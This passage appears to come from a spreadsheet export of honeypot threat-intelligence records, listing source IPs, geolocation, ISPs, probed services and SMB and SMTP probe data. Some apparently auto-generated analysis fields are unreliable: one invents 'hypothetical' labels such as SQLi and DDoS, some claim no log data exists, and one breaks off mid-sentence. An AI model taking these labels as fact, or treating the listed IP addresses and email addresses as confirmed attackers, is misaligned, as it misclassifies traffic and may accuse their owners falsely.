'TO:&lt;keithwarren94@outlook.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;NA&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '156.244.37.11_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Wed, 16 Apr 2025 07:36:23 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;info@zapel.com&gt;', 'command': 'MAIL', 'data': 'None'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:423f:bbb7"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="High&amp;&amp;Medium&amp;&amp;Low"/>
    <s v="An attempt to reset the SMTP connection, possibly indicating an attacker trying to reuse or hide their email session. This can be a sign of malicious activity as it may help evade detection or bypass security measures. It is likely an attack on the system's email functionality. &amp;&amp; Malicious actor is attempting to reset SMTP connection likely for spamming or brute force attacks on a mail server._x000a_They're possibly trying to reuse the connection after a failed login attempt to bypass rate limits._x000a_This activity suggests an attempt to exploit mail server vulnerabilities."/>
    <s v="Scanning Attempt"/>
  </r>
  <r>
    <x v="248"/>
    <x v="248"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T06:11:17"/>
    <d v="2024-12-27T19:49:15"/>
    <d v="2025-04-30T06:11:17"/>
    <n v="14"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;abuseipdb"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="EG"/>
    <s v="Egypt"/>
    <s v="C"/>
    <s v="Cairo"/>
    <s v="NA"/>
    <s v="Cairo"/>
    <s v="360630"/>
    <s v="NA"/>
    <s v="30.0444"/>
    <s v="31.2357"/>
    <s v="24835"/>
    <s v="Vodafone Data - Egypt"/>
    <s v="Vodafone Data"/>
    <s v="cellular"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c586:fca1"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="249"/>
    <x v="249"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T06:11:15"/>
    <d v="2024-12-31T09:09:47"/>
    <d v="2025-04-30T06:11:15"/>
    <n v="71"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;35312&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="AP"/>
    <s v="Andhra Pradesh"/>
    <s v="Guntur"/>
    <s v="Mangalagiri"/>
    <s v="1263797"/>
    <s v="NA"/>
    <s v="16.4308"/>
    <s v="80.5682"/>
    <s v="135765"/>
    <s v="WEBMAX NETWORK SOLUTIONS PRIVATE LIMITED"/>
    <s v="Webmax Network Solutions Private Limited"/>
    <s v="business"/>
    <s v="Webmax Network Solutions Private Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67b6:7492"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="250"/>
    <x v="250"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T06:11:14"/>
    <d v="2024-11-24T04:33:09"/>
    <d v="2025-04-30T06:11:14"/>
    <n v="65"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AR"/>
    <s v="Arkansas"/>
    <s v="Pulaski"/>
    <s v="Little Rock (River Mountain)"/>
    <s v="4119403"/>
    <s v="72212"/>
    <s v="34.7867"/>
    <s v="-92.3969"/>
    <s v="7029"/>
    <s v="Windstream Communications LLC"/>
    <s v="Windstream Communications LLC"/>
    <s v="business"/>
    <s v="Windstream Communications LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cfaa:382e"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No log data provided, unable to analyze for malicious activity."/>
    <s v="I need the log data to analyze it. Please provide it, and I'll give you the results as per your requirements."/>
  </r>
  <r>
    <x v="251"/>
    <x v="251"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T06:11:10"/>
    <d v="2025-04-07T22:34:03"/>
    <d v="2025-04-30T06:11:10"/>
    <n v="16"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H33"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="11"/>
    <s v="Seoul"/>
    <s v="Yongsan-gu"/>
    <s v="Yongsan-dong (Hangang-daero)"/>
    <s v="6800487"/>
    <s v="NA"/>
    <s v="37.5379"/>
    <s v="126.97"/>
    <s v="17858"/>
    <s v="LG POWERCOMM"/>
    <s v="LG POWERCOMM"/>
    <s v="business"/>
    <s v="Xpeed"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7a24:bb05"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="252"/>
    <x v="252"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T06:11:09"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-30T06:11:09"/>
    <n v="220"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H28&amp;&amp;SMA-LAB_SMB_H31&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_SMB_H30"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;15167&amp;&amp;1433&amp;&amp;445&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="EG"/>
    <s v="Egypt"/>
    <s v="GZ"/>
    <s v="Giza"/>
    <s v="Dokki"/>
    <s v="Giza"/>
    <s v="360995"/>
    <s v="NA"/>
    <s v="30.0482"/>
    <s v="31.2062"/>
    <s v="36992"/>
    <s v="ETISALAT MISR"/>
    <s v="Etisalat"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,59379)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,55225)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,55404)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,55870)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,55957)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,50154)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,50224)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,49436)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,49553)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,61629)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,61726)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,63927)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,64184)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,57445)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,50096)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,50232)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,49790)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,49888)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,57094)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,57695)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,62747)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,62899)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,56576)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,56767)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,63453)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,63551)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,64400)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,64478)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d936:460a"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="253"/>
    <x v="253"/>
    <s v="host217-35-70-149.in-addr.btopenworld.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-30T06:10:55"/>
    <d v="2023-11-06T15:26:00"/>
    <d v="2025-04-30T06:10:55"/>
    <n v="410"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_SSH_H25&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H10"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;56146&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Greater London"/>
    <s v="London (South Bank)"/>
    <s v="2643743"/>
    <s v="SE1"/>
    <s v="51.5037"/>
    <s v="-0.111676"/>
    <s v="2856"/>
    <s v="British Telecommunications PLC"/>
    <s v="BT Public Internet Service"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d923:4695"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="254"/>
    <x v="254"/>
    <s v="220-135-160-52.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-30T06:10:55"/>
    <d v="2025-01-19T10:33:43"/>
    <d v="2025-04-30T06:10:55"/>
    <n v="364"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H40"/>
    <s v="23&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NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc87:a034"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The observed activities indicate a reconnaissance phase by the attacker, scanning for vulnerable services and attempting to connect to them. The attacker is likely using automated tools to quickly scan multiple ports and protocols. &amp;&amp; The activity observed appears to be reconnaissance and scanning by an attacker, attempting to identify and exploit vulnerabilities in various services on the network. The attacker is probing for open ports, testing authentication credentials, and gathering information about the network devices."/>
    <s v="Scanning &amp;&amp;  Port scanning and reconnaissance. "/>
  </r>
  <r>
    <x v="255"/>
    <x v="255"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T06:10:46"/>
    <d v="2024-10-28T09:30:38"/>
    <d v="2025-04-30T06:10:46"/>
    <n v="118"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_MT-CPA_H43"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;43093&amp;&amp;NA&amp;&amp;15839&amp;&amp;34544&amp;&amp;34543&amp;&amp;35001&amp;&amp;60101&amp;&amp;21199"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="EG"/>
    <s v="Egypt"/>
    <s v="GZ"/>
    <s v="Giza"/>
    <s v="الحوامدية"/>
    <s v="Al Ḩawāmidīyah"/>
    <s v="361179"/>
    <s v="NA"/>
    <s v="29.9012"/>
    <s v="31.2727"/>
    <s v="24835"/>
    <s v="Vodafone Data - Egypt"/>
    <s v="Vodafone Data"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c4dd:a5f2"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="This indicates an attempt to establish a connection, but the specific service or protocol is unknown as it's designated &quot;TELNET&quot;, which is a common remote access protocol that might be exploited for malicious purposes. The fact that there's no activity recorded suggests the attempt was unsuccessful. This could be a probing or reconnaissance effort by an attacker. &amp;&amp; No log data provided, unable to analyze or provide information about possible malicious activity."/>
    <s v="Since there's no log data provided, I'll start fresh. Here are some hypothetical examples:_x000a__x000a_1. **Scanning**_x000a_2. **Bruteforce**_x000a_3. **SQLi** _x000a_4. **DDoS** _x000a_5. **Portscan**"/>
  </r>
  <r>
    <x v="256"/>
    <x v="256"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T06:10:44"/>
    <d v="2024-07-10T02:52:00"/>
    <d v="2025-04-30T06:10:44"/>
    <n v="125"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H17&amp;&amp;SMA-LAB_SMB_H10&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_SMB_H34&amp;&amp;SMA-LAB_MSSQL_H28"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;1433&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="CO"/>
    <s v="Colombia"/>
    <s v="DC"/>
    <s v="Bogota D.C."/>
    <s v="Bogotá  D.C."/>
    <s v="Bogotá (Teusaquillo)"/>
    <s v="3688689"/>
    <s v="111321"/>
    <s v="4.64758"/>
    <s v="-74.1017"/>
    <s v="19429"/>
    <s v="ETB - Colombia"/>
    <s v="ETB - Colombia"/>
    <s v="business"/>
    <s v="EPS CONVIDA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,59433)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,3267)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,9153)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,8324)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,43780)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,63608)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,65079)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,62488)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,1210)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,59059)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,16000)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,7198)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,3573)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,13624)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,52182)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,46986)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,24673)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,64827)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,32687)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,59621)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,8770)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,55807)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:be1a:d082"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="It appears that the attacker is conducting a reconnaissance and scanning of various services on the network to identify vulnerabilities and potential entry points for further exploitation. &amp;&amp; No log data provided, therefore no information can be analyzed or described."/>
    <s v="The attacker seems to be attempting to:"/>
  </r>
  <r>
    <x v="257"/>
    <x v="257"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T06:06:35"/>
    <d v="2024-04-11T10:16:00"/>
    <d v="2025-04-30T06:06:35"/>
    <n v="633"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;SIP Endpoint Enumeration"/>
    <s v="low"/>
